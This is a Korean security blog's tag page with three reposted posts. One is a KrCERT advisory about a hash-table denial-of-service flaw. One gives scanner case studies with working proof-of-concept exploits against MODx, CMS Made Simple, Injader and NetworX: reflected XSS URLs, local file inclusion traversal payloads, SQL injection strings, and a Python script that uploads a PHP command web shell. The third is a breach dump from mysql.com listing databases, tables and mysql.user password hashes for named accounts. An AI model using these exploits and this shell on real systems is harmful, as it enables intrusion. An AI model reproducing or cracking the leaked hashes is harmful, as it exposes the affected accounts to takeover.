'php'에 해당되는 글 65건

  1. 2012.01.03 해시 테이블 구현 취약점 관련 보안 업데이트 (2)
  2. 2011.11.21 PHP Vulnerability Hunter
  3. 2011.09.27 MySql.Com Hacked with Blind SQL Injection by Jackh4xor
2012.01.03 09:40

해시 테이블 구현 취약점 관련 보안 업데이트

□ 개요
   o 해시 테이블 구현 오류로 인해 해당 기능을 사용하는 다양한 응용프로그램 및 서비스를
      대상으로, 장애를 유발시킬 수 있는 취약점이 발견됨
   o 공격자는 해당 취약점에 영향 받는 시스템에 특수하게 조작된 요청을 전송 할 경우,
      서비스 거부 상태를 유발시킬 수 있음

□ 해당 시스템
   o 영향 받는 시스템
     - .NET Framework MS11-100 보안패치 이전 버전
     - PHP 5.3.8, 5.4.0RC3 및 이전버전
     - Apache Tomcat 5.534, 6.0.34, 7.0.22 및 이전버전

□ 해결방안
   o 취약한 .NET Framework 버전 사용자
     - 최신 윈도우 보안패치를 적용하여 MS11-100 업데이트 수행 [1]
   o 취약한 PHP 버전 사용자
     - PHP 5.3.9, 5.4.0RC4 및 이상버전으로 업데이트 수행 [2]
   o 취약한 Apache Tomcat 버전 사용자
     - Apache Tomcat 5.5.35, 6.0.35, 7.0.23 및 이상버전으로 업데이트 수행 [3]

□ 용어정리
   o 해시 테이블
     - 해싱 함수의 연산에 의해 구해진 위치에 각 레코드를 한 개 이상 보관할 수 있는
       버킷(bucket)들로 구성된 기억 공간.

□ 기타 문의사항
   o 보안권고에 포함되지 않은 응용프로그램 등에 대한 보안업데이트는 언제인가요?
     - 해당 취약점과 관련된 중요 보안업데이트 발표 시 KrCERT/CC 홈페이지를 통해
       신속히 공지할 예정입니다
   o 한국인터넷진흥원 인터넷침해대응센터: 국번없이 118

[참고사이트]
[1] http://technet.microsoft.com/ko-kr/security/bulletin/MS11-100
[2] http://www.php.net/
[3] http://tomcat.apache.org/


Trackback 0 Comment 2
  1. armada 2012.01.05 11:49 address edit & del reply

    php나 tomcat의 경우 참고 사이트에도 관련 내용이 없는데요. 패치는 어디서 받을 수 있을까요?

2011.11.21 20:48

PHP Vulnerability Hunter

All testing was performed on Windows XP and Vista using XAMPP. Each target application was installed, then a full scan was performed. Noteworthy log entries revealing exploitable faults are shown followed by the expoit proof of concepts and resulting advisories.

Case Study 1: MODx Revolution 2.0.2-pl

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /modx/manager/index.php?service=12%3cscript%3ealert(0)%3c%2fscript%3e&login_context=12%3cscript%3ealert(0)%3c%2fscript%3e&q=12%3cscript%3ealert(0)%3c%2fscript%3e&cultureKey=12%3cscript%3ealert(0)%3c%2fscript%3e&modahsh=12%3cscript%3ealert(0)%3c%2fscript%3e&installGoingOn=12%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 13:54:18 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=653ch30lgkjk9bo8b7gu13u8u4; expires=Thu, 27-Jan-2011 13:54:18 GMT; path=/modx/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Thu, 20 Jan 2011 13:54:18 GMT
Cache-Control: post-check=0, pre-check=0
Content-Length: 6946
Content-Type: text/html; charset=UTF-8

[Response Trimmed]
<form id="modx-login-form" action="" method="post">
<input type="hidden" name="login_context" value="mgr" />
<input type="hidden" name="modahsh" value="12<script>alert(0)</script>" />
[Response Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Original Advisory

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /modx/manager/controllers/default/resource/tvs.php?class_key=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00&resource=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2flfi_test.txt%00 HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Thu, 20 Jan 2011 04:21:29 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 11
Content-Type: text/html

LFI_Test123

Local File Inclusion Proof of Concept

http://localhost/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
Original Advisory 


Case Study 2: CMS Made Simple 1.8

Local File Inclusion Log Entry

Alert Name: Local File Inclusion
POST /cmsms/admin/addbookmark.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 192
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="default_cms_lang"

../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../lfi_test.txt 
------x--


HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 05:00:36 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: CMSSESSID839fe7b5=uk0uvk8aja6cfajgluik3sbok3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sp_=883fc4fd
Content-Length: 322
Content-Type: text/html

LFI_Test123<script type="text/javascript">
<!--
    location.replace("http://localhost/cmsms/admin/login.php");
// -->
</script>
<noscript>
    <meta http-equiv="Refresh" content="0;URL=http://localhost/cmsms/admin/login.php">
</noscript>

Local File Inclusion Proof of Concept

import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
urllib.urlencode({ 'default_cms_lang': lfi }),
{ 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()
Original Advisory 


Case Study 3: Injader 2.4.4

SQL Injection Log Entry

Alert Name: Potential SQL Injection
POST /injader/login.php?un='%3b--%22%3b--&pw='%3b--%22%3b-- HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 02:30:15 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Content-Length: 794
Content-Type: text/html

<br />
<b>Deprecated</b>:  Function split() is deprecated in <b>C:\tools\xampp\htdocs\injader\sys\includes\ifw\IQuery.php</b> on line <b>143</b><br />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" 
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html>
<head>
<title>Database Error</title>
<link rel="stylesheet" type="text/css" href="/injader/sys/loginpage.css" />
</head>
<body>
<div id="mPage">
<h1>Database Error</h1>
<p>Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''\'' at line 1. </p>

<p>Your query was: SELECT username, id FROM maj_users WHERE username = '\'</p>
<p id="err-src"><strong>Source:</strong> User::ValidateLogin; Line: 179</p>
</div>
</body>
</html>

SQL Inection Proof of Concept

http://localhost/injader/login.php?un=\\'%20or%20id=1%20and%20'a'='a&pw=\\'%20or%20'a'='a
Original Advisory 


Case Study 4: NetworX 1.0.3

Arbitrary Upload Log Entry

Alert Name: Arbitrary File Event - Type=Changed Path=C:\tools\xampp\htdocs\networx\tmp\shell.php
POST /networx/about.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 195
Cache-Control: max-age=0
Origin: null
Content-Type: multipart/form-data; boundary=----x
Accept: text/html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

------x
Content-Disposition: form-data; name="shell_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php echo '<pre>' + system($_GET['CMD']) + '</pre>'; ?>
------x--


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:34:40 GMT
[Trimmed]

Shell Upload Proof of Concept

import sys, socket
host = 'localhost'
path = '/networx'
port = 80

def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)    

s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 193\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n\r\n'
'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
'------x--\r\n\r\n')

resp = s.recv(8192)

http_ok = 'HTTP/1.1 200 OK'

if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'

shell_path = path + '/tmp/shell.php'

s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'        
else: print 'shell located at http://' + host + shell_path

upload_shell()
Original Advisory

Reflected Cross-site Scripting Log Entry

Alert Name: Reflected XSS
GET /networx/group_connections_list_popup.php?logout=181%3cscript%3ealert(0)%3c%2fscript%3e&group_id=181%3cscript%3ealert(0)%3c%2fscript%3e HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
User-Agent: x
Content-Length: 0
Cache-Control: max-age=0
Origin: null
Accept: text/html
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3


HTTP/1.1 200 OK
Date: Sun, 23 Jan 2011 23:38:22 GMT
Server: Apache/2.2.14 (Win32) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l mod_autoindex_color PHP/5.3.1 mod_apreq2-20090110/2.7.1 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.1
Set-Cookie: PHPSESSID=jl5bal27shg6e9akhu5566lqu7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 2107
Content-Type: text/html

[Trimmed]
<input type="hidden" name="GroupID" value="181<script>alert(0)</script>" />
<input type="image" src="images/btn-send_invitations.gif" alt="Send Invitations" />
[Trimmed]

Reflected Cross-site Scripting Proof of Concept

http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
Original Advisory


출처 : autosectools.com

Trackback 1 Comment 0
2011.09.27 16:55

MySql.Com Hacked with Blind SQL Injection by Jackh4xor

The Mysql website offers database software, services and support for your business, including the Enterprise server, the Network monitoring and advisory services and the production support. The wide range of products include: Mysql clusters, embedded database, drivers for JDBC, ODBC and Net, visual database tools (query browser, migration toolkit) and last but not least the MaxDB- the open source database certified for SAP/R3. The Mysql services are also made available for you. Choose among the Mysql training for database solutions, Mysql certification for the Developers and DBAs, Mysql consulting and support. It makes no difference if you are new in the database technology or a skilled developer of DBA, Mysql proposes services of all sorts for their customers.


Vulnerable Target http://mysql.com/customers/view/index.html?id=1170
Host IP 213.136.52.29
Web Server Apache/2.2.15 (Fedora)
Powered-by PHP/5.2.13
Injection Type MySQL Blind
Current DB Web

Data Bases:

information_schema
bk
certification
c?ashme
cust_sync_interim
customer
dbasavings
downloads
feedback
glassfish_interface
intranet
kaj
license_customers
manual
manual_search
mem
mysql
mysqlforge
mysqlweb
news_events
partner_t?aining
partners
partners_bak
phorum5
planetmysql
qa_contribution
quickpoll
robin
rp
sampo
sampo_interface
sessions
softrax
softrax_interim
solutions
tco
test
track
track_refer
wb
web
web_control
web_projects
web_training
webwiki
wordpress
zack

Current DB: web

Tables:

xing_validation
v_web_submissions
userbk
user_extra
user  Columns: cwpid version lead_quality sfid industry address2 created last_modified lang notify newsletter gid title fax cell phone country zipcode state city address business company position lastname firstname passwd verified bounces email user_id
us_zip_state
us_area_state
unsub_log
trials
trial_external_log
trial_data
trial_alias
training_redirect
tag_blacklist
tag_applied
tag
support_feeds_DROP
support_entries_DROP
states
snapshots_builds
snapshots
sakilapoints
regions
quote_customer
quote
quicklinks
promo
product_releases
position
partner
paper_lead
paper_details_options
paper_details_old
paper_details
paper
newsletter_unsub
nav_sites
nav_items
mysql_history
mirror_status
mirror_country
mirror_continent
mirror
mailing_list_member
mailing_list
locks
lead_validity_rules
lead_source_xref
lead_source_external
lead_source
lead_routing_rule
lead_rep
lead_old
lead_note
lead_extra_old
lead_extra_new
lead_extra
lead_companies
lead_campaign_member
lead
language_strings
language_modules
imagecache
hall_of_fame
g_search_term
g_search_data
g_blog_data
forum_comment
forms
field_xref
field_options
field_match
email_blacklist
email_a_friend
drpl_manual_review
drpl_denied
drpl_check_log
drpl_cache
customer_meta_sets
customer_meta_set
customer_meta
customer
coupon_product
coupon_campaign_attribute
coupon_campaign
coupon
country
countries
campaign_type
campaign_topic
campaign_score
campaign_listdata
campaign_detail
business
bounces

Database : mysql

Table:

user_info
user     Column: Update_pri Insert_priv Select_priv Password User Host
time_zone_transition_type
time_zone_transition
time_zone_name
time_zone_leap_second
time_zone
tables_priv
slow_log
?ervers
procs_priv
proc
plugin
ndb_binlog_index
inventory
host
help_topic
help_relation
help_keyword
help_category
general_log
func
event
db
columns_priv

# mysql.user Data

Password                                                                     User            Host
wembaster     %
monitor         10.%
sys                %
sys               localhost
*06581D0A5474DFF4D5DA3CE0CD7702FA52601412      forumread     %
*0702AEBF8E92A002E95D40247776E1A67CD2CA3F     wb                %
*2A57F767D29295B3CB8D01C760D9939649483F85        flipper           10.%
*32F623705BFFFE682E7BD18D5357B38EF8A5BAA9     wordpress       %
*66A905D4110DF14B41D585FDBCE0666AD13DD8C1     nagios            %
*704EB56151317F27573BB4DDA98EDF00FFABAAF8     root              localhost
*ED1BDC19B08FD41017EE180169E5CEB2C77F941A     mysqlforge     %
*FD75B177FFEC3590FE5D7E8459B3DDC60AE8147B     webleads      10.%
00680dd718880337                                                        olof                %
077f61a849269b62                                                         qa_r               %
077f61a849269b62                                                         qa_rw             %
077f61a849269b62                                                         qa_adm          %
0c2f46ba6b87d4ea                                                         trials_admin    10.%
1856b9b03b5a6f47                                                         cacti               %
19519e95545509b5                                                        certification      %
1a39dcad63bbc7a6                                                        gf_mschiff        %
2277fd7d562ec459                                                         webslave        localhost
2277fd7d562ec459                                                         webslave          %
304404b114b5516c                                                        planetmysql_rw %
35e376451a87adb0                                                        planetmysql_ro  %
4e203d581b756a93                                                        webmaster     localhost
4e203d581b756a93                                                        webmaster        %
4e93479179a8ec93                                                        sysadm             %
575ec47e16c7e20e                                                        phorum5            %
575ec47e16c7e20e                                                        lenz                  %
5f340ec40a706f64                                                          robin                 %
61113da02d2c97a5                                                        regdata              %
616075f256f111ba                                                          myadmin        10.100.6.44
61711eea3de509ac                                                        merlin             127.0.0.1
6302de0909a369a1                                                        ebraswell           %
6b72b2824cc7f6fe                                                          mysqlweb          %
6ffd2b17498cdd44                                                          zack                 %
70599cf351c6f591                                                          repl                   %
740284817e3ed5a8                                                        webwiki             %
74c5529b41a97cc2                                                        web_projects

Databsae: web_control

Table:

system
system_command
service_request
run_control
request_daemon
rebuild_server
rebuild_queue
rebuild_control
quarterly_lead_report
newsletter_log
newsletter_control
ips
hosts  Columns:notes description name
dns_servers Columns: name internal ip

Database: certification

Tables:

signup
corpcustomers
certexamdata
certcandidatedata
certaccess

Database: wordpress

Tables:

wp_4_term_taxonom
wp_4_term_relationships
wp_4_posts
wp_4_postmeta
wp_4_options
wp_4_links
wp_4_comments
wp_3_terms
wp_3_term_taxonomy
wp_3_term_relationships
wp_3_posts
wp_3_postmeta
wp_3_options
wp_3_links
wp_3_comments
wp_2_terms
wp_2_term_taxonomy
wp_2_term_relationships
wp_2_posts
wp_2_postmeta
wp_2_options
wp_2_links
wp_2_comments
wp_1_terms
wp_1_term_taxonomy
wp_1_term_relationships
wp_1_posts
wp_1_postmeta
wp_1_options
wp_1_links
wp_1_comments
wp_11_terms
wp_11_term_taxonomy
wp_11_term_relationships
wp_11_posts
wp_11_postmeta
wp_11_options
wp_11_links
wp_11_comments
wp_10_terms
wp_10_term_taxonomy
wp_10_term_relationships
wp_10_posts
wp_10_postmeta
wp_10_options
wp_10_links
wp_10_comments
remove_queries

Database: bk

Table:

wp_backupterm_taxonomy
wp_backupterm_relationships
wp_backupposts
wp_backuppostmeta
wp_backupoptions
wp_backuplinks
wp_backupcomments

News Source : Jackh4xor



출처 : thehackernews.com

Trackback 0 Comment 0